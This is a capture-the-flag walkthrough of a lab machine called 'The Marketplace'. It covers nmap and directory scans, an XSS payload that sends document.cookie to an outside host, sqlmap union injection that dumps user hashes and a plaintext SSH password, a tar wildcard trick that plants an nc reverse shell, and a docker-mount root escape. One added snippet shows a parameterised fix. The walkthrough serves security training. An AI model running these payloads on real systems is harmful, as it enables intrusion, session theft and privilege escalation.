Preface
bilibili:Zacarx
www.zacarx.com
nmap
┌──(zacarx㉿zacarx)-[~]
└─$ nmap -T4 -A 10.10.96.223
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-25 22:22 CST
Nmap scan report for 10.10.96.223 (10.10.96.223)
Host is up (0.27s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c8:3c:c5:62:65:eb:7f:5d:92:24:e9:3b:11:b5:23:b9 (RSA)
| 256 06:b7:99:94:0b:09:14:39:e1:7f:bf:c7:5f:99:d3:9f (ECDSA)
|_ 256 0a:75:be:a2:60:c6:2b:8a:df:4f:45:71:61:ab:60:b7 (ED25519)
80/tcp open http nginx 1.19.2
|_http-title: The Marketplace
| http-robots.txt: 1 disallowed entry
|_/admin
|_http-server-header: nginx/1.19.2
32768/tcp open http Node.js (Express middleware)
| http-robots.txt: 1 disallowed entry
|_/admin
|_http-title: The Marketplace
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 36.03 seconds
Directory scan
┌──(zacarx㉿zacarx)-[~]
└─$ dirb http://10.10.198.229
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Tue Oct 25 22:42:22 2022
URL_BASE: http://10.10.198.229/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.10.198.229/ ----
+ http://10.10.198.229/admin (CODE:403|SIZE:392)
+ http://10.10.198.229/Admin (CODE:403|SIZE:392)
+ http://10.10.198.229/ADMIN (CODE:403|SIZE:392)
> Testing: http://10.10.198.229/hidden
XSS exploitation
nc -lnvp 4444
Remember to start the listener first, then submit the report.
Advanced sqlmap usage
┌──(zacarx㉿zacarx)-[~]
└─$ sqlmap -u "http://10.10.96.223/admin?user=1*" --cookie='token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjIsInVzZXJuYW1lIjoibWljaGFlbCIsImFkbWluIjp0cnVlLCJpYXQiOjE2NjY3MDIzNjJ9.6H2GkGYJGZvijqoRHutzLqWJDm8Ungx7pGUnZ-ksZLQ' --technique=U --delay=1 -dbs
___
__H__
___ ___[(]_____ ___ ___ {1.6.7#stable}
|_ -| . ["] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 20:55:39 /2022-10-25/
custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q] y
Cookie parameter 'token' appears to hold anti-CSRF token. Do you want sqlmap to automatically update it in further requests? [y/N] n
[20:55:46] [INFO] testing connection to the target URL
[20:55:48] [INFO] checking if the target is protected by some kind of WAF/IPS
[20:55:50] [INFO] heuristic (basic) test shows that URI parameter '#1*' might be injectable (possible DBMS: 'MySQL')
[20:55:52] [INFO] testing for SQL injection on URI parameter '#1*'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] y
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] y
[20:56:05] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[20:56:06] [WARNING] reflective value(s) found and filtering out
[20:56:08] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[20:56:14] [INFO] target URL appears to have 4 columns in query
[20:56:25] [INFO] URI parameter '#1*' is 'Generic UNION query (NULL) - 1 to 10 columns' injectable
[20:56:25] [INFO] checking if the injection point on URI parameter '#1*' is a false positive
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 24 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: UNION query
Title: Generic UNION query (NULL) - 4 columns
Payload: http://10.10.96.223:80/admin?user=-2079 UNION ALL SELECT CONCAT(0x71706a7671,0x78697a6b7a4351494968436b714c4f587269657a745457465a504f786d797572634a504271534f55,0x71767a6b71),NULL,NULL,NULL-- -
---
[20:56:40] [INFO] testing MySQL
[20:56:41] [INFO] confirming MySQL
[20:56:44] [INFO] the back-end DBMS is MySQL
web application technology: Nginx 1.19.2, Express
back-end DBMS: MySQL >= 8.0.0
[20:56:51] [INFO] fetching database names
available databases [2]:
[*] information_schema
[*] marketplace
[20:56:52] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 10 times
[20:56:52] [INFO] fetched data logged to text files under '/home/zacarx/.local/share/sqlmap/output/10.10.96.223'
[*] ending @ 20:56:52 /2022-10-25/
┌──(zacarx㉿zacarx)-[~]
└─$ sqlmap -u "http://10.10.96.223/admin?user=1*" --cookie='token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjIsInVzZXJuYW1lIjoibWljaGFlbCIsImFkbWluIjp0cnVlLCJpYXQiOjE2NjY3MDIzNjJ9.6H2GkGYJGZvijqoRHutzLqWJDm8Ungx7pGUnZ-ksZLQ' --technique=U --delay=1 -D marketplace --dump
[*] starting @ 20:57:14 /2022-10-25/
custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q] y
Cookie parameter 'token' appears to hold anti-CSRF token. Do you want sqlmap to automatically update it in further requests? [y/N] y
[20:57:17] [INFO] resuming back-end DBMS 'mysql'
[20:57:17] [INFO] testing connection to the target URL
[20:57:18] [CRITICAL] anti-CSRF token 'token' can't be found at 'http://10.10.96.223:80/admin?user=1'. You can try to rerun by providing a valid value for option '--csrf-url'
[*] ending @ 20:57:18 /2022-10-25/
┌──(zacarx㉿zacarx)-[~]
└─$ sqlmap -u "http://10.10.96.223/admin?user=1*" --cookie='token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjIsInVzZXJuYW1lIjoibWljaGFlbCIsImFkbWluIjp0cnVlLCJpYXQiOjE2NjY3MDIzNjJ9.6H2GkGYJGZvijqoRHutzLqWJDm8Ungx7pGUnZ-ksZLQ' --technique=U --delay=1 -D marketplace --dump
[*] starting @ 20:57:21 /2022-10-25/
custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q] y
Cookie parameter 'token' appears to hold anti-CSRF token. Do you want sqlmap to automatically update it in further requests? [y/N] n
[20:57:24] [INFO] resuming back-end DBMS 'mysql'
[20:57:24] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
Type: UNION query
Title: Generic UNION query (NULL) - 4 columns
Payload: http://10.10.96.223:80/admin?user=-2079 UNION ALL SELECT CONCAT(0x71706a7671,0x78697a6b7a4351494968436b714c4f587269657a745457465a504f786d797572634a504271534f55,0x71767a6b71),NULL,NULL,NULL-- -
---
[20:57:25] [INFO] the back-end DBMS is MySQL
web application technology: Express, Nginx 1.19.2
back-end DBMS: MySQL 8
[20:57:25] [INFO] fetching tables for database: 'marketplace'
[20:57:26] [INFO] fetching columns for table 'items' in database 'marketplace'
[20:57:28] [INFO] fetching entries for table 'items' in database 'marketplace'
[20:57:29] [INFO] recognized possible password hashes in column 'image'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[20:57:39] [INFO] writing hashes to a temporary file '/tmp/sqlmaplnctc6c13775/sqlmaphashes-ft657rdv.txt'
do you want to crack them via a dictionary-based attack? [Y/n/q] y
[20:57:42] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[20:57:49] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] n
[20:57:53] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[20:57:53] [INFO] starting 4 processes
[20:58:03] [WARNING] no clear password(s) found
Database: marketplace
Table: items
[7 entries]
+----+----------------------------------+-------------+--------+---------------------------------------------------------------------+
| id | image | title | author | description |
+----+----------------------------------+-------------+--------+---------------------------------------------------------------------+
| 1 | 867a9d1a2edc2995dca4b13de50fc545 | Dell Laptop | 2 | Good as new. |
| 2 | abffe546fb4cb740cc6b44f9e4c263df | A cactus | 3 | Yep, that's a cactus. |
| 3 | 598815c0f5554115631a3250e5db1719 | a | 4 | axxxxx |
| 4 | 598815c0f5554115631a3250e5db1719 | a | 4 | <script> alert(1) </script> |
| 5 | 598815c0f5554115631a3250e5db1719 | a | 4 | <script>fetch("http://10.17.0.91:4444/"+document.cookie)</script> |
| 6 | 598815c0f5554115631a3250e5db1719 | av | 4 | <script>fetch("http://10.10.96.223:4444/"+document.cookie)</script> |
| 7 | 598815c0f5554115631a3250e5db1719 | asa | 4 | <script>fetch("http://10.17.0.91:4444/"+document.cookie)</script> |
+----+----------------------------------+-------------+--------+---------------------------------------------------------------------+
[20:58:03] [INFO] table 'marketplace.items' dumped to CSV file '/home/zacarx/.local/share/sqlmap/output/10.10.96.223/dump/marketplace/items.csv'
[20:58:03] [INFO] fetching columns for table 'messages' in database 'marketplace'
[20:58:05] [INFO] fetching entries for table 'messages' in database 'marketplace'
Database: marketplace
Table: messages
[11 entries]
+----+---------+---------+-----------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| id | is_read | user_to | user_from | message_content |
+----+---------+---------+-----------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| 1 | 1 | 3 | 1 | Hello!\r\nAn automated system has detected your SSH password is too weak and needs to be changed. You have been generated a new temporary password.\r\nYour new password is: @b_ENXkGYUCAv3zJ |
| 2 | 1 | 4 | 1 | Thank you for your report. One of our admins will evaluate whether the listing you reported breaks our guidelines and will get back to you via private message. Thanks for using The Marketplace! |
| 3 | 1 | 4 | 1 | Thank you for your report. We have reviewed the listing and found nothing that violates our rules. |
| 4 | 1 | 4 | 1 | Thank you for your report. One of our admins will evaluate whether the listing you reported breaks our guidelines and will get back to you via private message. Thanks for using The Marketplace! |
| 5 | 1 | 4 | 1 | Thank you for your report. We have reviewed the listing and found nothing that violates our rules. |
| 6 | 1 | 4 | 1 | Thank you for your report. One of our admins will evaluate whether the listing you reported breaks our guidelines and will get back to you via private message. Thanks for using The Marketplace! |
| 7 | 1 | 4 | 1 | Thank you for your report. We have reviewed the listing and found nothing that violates our rules. |
| 8 | 1 | 4 | 1 | Thank you for your report. One of our admins will evaluate whether the listing you reported breaks our guidelines and will get back to you via private message. Thanks for using The Marketplace! |
| 9 | 1 | 4 | 1 | Thank you for your report. We have reviewed the listing and found nothing that violates our rules. |
| 10 | 1 | 4 | 1 | Thank you for your report. One of our admins will evaluate whether the listing you reported breaks our guidelines and will get back to you via private message. Thanks for using The Marketplace! |
| 11 | 0 | 4 | 1 | Thank you for your report. We have reviewed the listing and found nothing that violates our rules. |
+----+---------+---------+-----------+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
[20:58:06] [INFO] table 'marketplace.messages' dumped to CSV file '/home/zacarx/.local/share/sqlmap/output/10.10.96.223/dump/marketplace/messages.csv'
[20:58:06] [INFO] fetching columns for table 'users' in database 'marketplace'
[20:58:07] [INFO] fetching entries for table 'users' in database 'marketplace'
Database: marketplace
Table: users
[4 entries]
+----+--------------------------------------------------------------+----------+-----------------+
| id | password | username | isAdministrator |
+----+--------------------------------------------------------------+----------+-----------------+
| 1 | $2b$10$83pRYaR/d4ZWJVEex.lxu.Xs1a/TNDBWIUmB4z.R0DT0MSGIGzsgW | system | 0 |
| 2 | $2b$10$yaYKN53QQ6ZvPzHGAlmqiOwGt8DXLAO5u2844yUlvu2EXwQDGf/1q | michael | 1 |
| 3 | $2b$10$/DkSlJB4L85SCNhS.IxcfeNpEBn.VkyLvQ2Tk9p2SDsiVcCRb4ukG | jake | 1 |
| 4 | $2b$10$eWi7EwPf1euh6kC4AUM4iur1VWx4ZYG5EUUebOEO6cMVUUZTGYmsG | Zacarx | 0 |
+----+--------------------------------------------------------------+----------+-----------------+
[20:58:09] [INFO] table 'marketplace.users' dumped to CSV file '/home/zacarx/.local/share/sqlmap/output/10.10.96.223/dump/marketplace/users.csv'
[20:58:09] [INFO] fetched data logged to text files under '/home/zacarx/.local/share/sqlmap/output/10.10.96.223'
[*] ending @ 20:58:09 /2022-10-25/
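As an added example (not code from the original writeup or from the target application), the query pattern that makes `/admin?user=` UNION-injectable, next to a validated, parameterised version; the handler shape and the `users` column list are assumptions, the payload shape is taken from the sqlmap output above.

```javascript
// Added example, not the target app's code. Assumption: the Express handler
// behind /admin?user=<id> built its SQL by string concatenation.

// Vulnerable pattern: the raw query-string value is spliced into the SQL text,
// so "-2079 UNION ALL SELECT ...,NULL,NULL,NULL-- -" becomes part of the
// statement and its four columns line up with the real SELECT.
function buildUserQueryUnsafe(userParam) {
  return "SELECT id, username, isAdministrator, password FROM users WHERE id = " + userParam;
}

// Hardened pattern: require a positive integer id and hand it to the driver as
// a bound parameter (the "?" placeholder of mysql/mysql2's query(sql, params)).
// Attacker-controlled text never reaches the SQL parser as SQL.
function buildUserQuerySafe(userParam) {
  if (!/^[1-9][0-9]*$/.test(String(userParam))) {
    throw new Error("invalid user id: " + userParam);
  }
  return {
    sql: "SELECT id, username, isAdministrator FROM users WHERE id = ?",
    params: [Number(userParam)],
  };
}

// Payload shape from the sqlmap run on this page (hex strings shortened).
const SQLMAP_PAYLOAD =
  "-2079 UNION ALL SELECT CONCAT(0x71706a7671,0x71767a6b71),NULL,NULL,NULL-- -";

// Runs both builders against the payload and against a legitimate id.
function demo() {
  const unsafeSql = buildUserQueryUnsafe(SQLMAP_PAYLOAD);
  const injected = /UNION ALL SELECT/i.test(unsafeSql); // true: payload became SQL
  let rejected = false;
  try {
    buildUserQuerySafe(SQLMAP_PAYLOAD);
  } catch (e) {
    rejected = true; // true: validation refused the payload
  }
  return { injected, rejected, safeForValidId: buildUserQuerySafe("2") };
}

console.log(demo());
```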
We now know the SSH password @b_ENXkGYUCAv3zJ; the user is one of system, michael, or jake.
So we get a shell very easily.
Privilege escalation
Wildcard privilege escalation - PENETRATION NOTE (heresecurity.wiki)
echo "mkfifo /tmp/lhennp; nc 10.17.0.91 8888 0</tmp/lhennp | /bin/sh >/tmp/lhennp 2>&1; rm /tmp/lhennp" > shell.sh
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > --checkpoint=1
sudo -u michael ./shell.sh
Docker escape
This requires the user to be privileged enough to run docker, i.e. being in the docker group or being root.
Any other Docker Linux image should work, e.g., debian.
docker run -v /:/mnt --rm -it alpine chroot /mnt sh